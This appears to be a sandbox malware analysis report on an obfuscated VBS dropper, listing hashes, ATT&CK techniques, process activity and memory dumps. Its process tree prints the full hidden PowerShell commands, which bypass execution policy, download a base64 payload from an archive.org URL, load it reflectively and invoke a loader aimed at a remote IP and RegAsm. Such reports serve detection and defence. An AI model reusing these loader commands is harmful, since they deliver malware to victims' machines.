f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41

General

Target

f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs
Size

283KB
MD5

0c6c4542c1abc5fc3d5eab3e4ab3793a
SHA1

288dfb240061530c2c73ae4183b7330623e94a69
SHA256

f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41
SHA512

7c3e22629060d8b18f1e88cbcb946d470599ac14699c75a7c1bf5cec0e174b8b3552eb6ec580defa747cb4cd5d9bfcc56e4ee9aa3dd366ed4272f88718ed8e2b
SSDEEP

6144:krHUuR5e0zLMcgGkkurXmTX/lb+rsb4Okiy+3kPvvA:kr0uR5e0nMc/kLrWTX/lb+rsb4Okiy47

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2112	powershell.exe
6	2112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
2112	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2968	powershell.exe
2112	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1792 wrote to memory of 2968	1792	WScript.exe	30
PID 1792 wrote to memory of 2968	1792	WScript.exe	30
PID 1792 wrote to memory of 2968	1792	WScript.exe	30
PID 2968 wrote to memory of 2112	2968	powershell.exe	32
PID 2968 wrote to memory of 2112	2968	powershell.exe	32
PID 2968 wrote to memory of 2112	2968	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ec1d66f42595856a279136d06fdb6260

SHA1
5066f540cfa58d49e1b36dd9d64db40ffa7873e2

SHA256
06ba5f96c04b8767ac738245d37e73f37bf43ca6ab4a2a2cf19aa1c4bb615c22

SHA512
11d2067d7a051c107c5a7958560e99028c7b038fd3c6742b01cfc3720472ae79f3922a2b64dc6b6bad904950d32576bb8b0daf03262cd7ce190a76249f28391d

Download Submit
memory/2968-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

Filesize
4KB

Download
memory/2968-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2968-6-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/2968-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2968-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2968-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2968-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2968-16-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing